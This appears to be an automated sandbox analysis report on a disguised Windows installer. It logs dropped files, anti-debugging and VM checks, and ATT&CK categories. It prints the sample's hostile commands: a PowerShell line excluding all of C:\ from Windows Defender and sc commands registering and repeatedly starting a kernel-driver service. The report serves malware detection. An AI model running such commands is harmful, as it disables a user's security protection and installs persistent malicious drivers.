Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Static file information: File size 5707472 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.1550924989.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.1550847522.0000000003970000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008A57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_008A57D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.7.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: real checksum: 0x0 should be: 0x571b37
Source: hrsw.vbc.7.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.13.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.drStatic PE information: section name: .didata
Source: 7zr.exe.7.drStatic PE information: section name: .sxdata
Source: update.vac.7.drStatic PE information: section name: .00cfg
Source: update.vac.7.drStatic PE information: section name: .voltbl
Source: update.vac.7.drStatic PE information: section name: .=~
Source: is-HSQ4G.tmp.7.drStatic PE information: section name: .xdata
Source: hrsw.vbc.7.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.7.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.7.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C6986EB push ecx; ret 7_2_6C6986FE
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C540F00 push ss; retn 0001h7_2_6C540F0A
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C766F10 push eax; ret 7_2_6C766F2E
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C6CB9F4 push 004AC35Ch; ret 7_2_6C6CBA0E
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C767290 push eax; ret 7_2_6C7672BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008245F4 push 008CC35Ch; ret 11_2_0082460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008BFB10 push eax; ret 11_2_008BFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008BFE90 push eax; ret 11_2_008BFEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.7.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.7.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\is-HSQ4G.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpJump to dropped file
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5481
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4352
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Window / User API: threadDelayed 599
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Window / User API: threadDelayed 605
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Window / User API: threadDelayed 535
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-HSQ4G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C68AEC0 FindFirstFileA,FindClose,FindClose, 7_2_6C68AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00826868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 11_2_00826868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00827496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 11_2_00827496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00829C60 GetSystemInfo, 11_2_00829C60
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000002.1526950336.0000000000A38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Z
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000002.1526950336.0000000000A38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C513886 NtSetInformationThread 00000000,00000011,00000000,00000000 7_2_6C513886
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6A0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6C6A0181
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 11_2_008A57D0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6A9D66 mov eax, dword ptr fs:[00000030h] 7_2_6C6A9D66
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6A9D35 mov eax, dword ptr fs:[00000030h] 7_2_6C6A9D35
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C69F17D mov eax, dword ptr fs:[00000030h] 7_2_6C69F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C698CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_6C698CBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.13.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C767720 cpuid 7_2_6C767720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0082AB2A GetSystemTimeAsFileTime,11_2_0082AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008C0090 GetVersion,11_2_008C0090
MITRE ATT&CK Matrix (techniques listed per tactic column; the number in brackets after a technique is the report's match-count badge as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
